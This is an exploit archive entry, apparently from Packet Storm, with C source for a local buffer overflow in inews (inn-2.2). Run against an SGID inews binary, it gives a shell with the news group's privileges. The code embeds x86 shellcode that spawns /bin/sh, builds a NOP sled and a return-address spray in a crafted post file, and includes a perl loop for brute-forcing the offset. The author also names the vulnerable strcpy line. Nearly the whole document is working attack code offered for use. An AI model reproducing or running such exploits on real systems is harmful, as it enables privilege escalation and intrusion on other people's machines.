Inews (inn-2.2) local buffer overflow - provides a gid=news shell if /usr/bin/inews is SGID. Includes perl script to find the offset.
b6fc73939a2932fcb984c5650ed44060c75fc8ec9c6504577440ac635fc07b5b/* (linux)inews[inn-2.2] buffer overflow, by Vade79->v9[v9@fakehalo.org].
this will give you a gid=news shell if /usr/bin/inews is SGID(news). i know
/usr/bin/inews comes default with versions of redhat, but i don't know about
other distributions.
cause (line601:inews.c): "(void)strcpy(from, HDR(_from));", use strncpy();
note: i found this while looking for a security hole in another program that
comes with inn, but it needs gid=news to run anyways. so this is a
bonus. also, you may want to clean up the defined TMPFILE afterwords.
after making this, i found another exploit of the same idea, this is
much more functional though.
the old perl script below for offset(s):
#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./inews_bof $i");
$i+=100;
} */
#include <stdio.h>
#define NEWSGID 13 // the group id of news.
#define ALIGN 0 // return alignment.
#define PATH "/usr/bin/inews" // path to the inews program.
#define TMPFILE "/tmp/bad.post" // file to overflow inews buffer with.
#define SUBJECT "inews bug." // required file filler.
#define NEWSGROUP "alt.inn.bug" // required file filler.
#define DEFAULT_OFFSET 650 // usual offset.
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // yeah, group id of news here.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // hex01 h00t!
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[600]; // give or take a few. (528)
int i,offset,gid=NEWSGID;
long ret;
FILE *inewsfile;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;}
exec[10]=gid;
for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
unlink(TMPFILE); // clean house.
inewsfile=fopen(TMPFILE,"w");
fprintf(inewsfile,"From: %s\n",bof); // required, woops.
fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
fclose(inewsfile);
printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
if(execlp(PATH,"inews","-h",TMPFILE,0)){
printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
exit(-1);
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed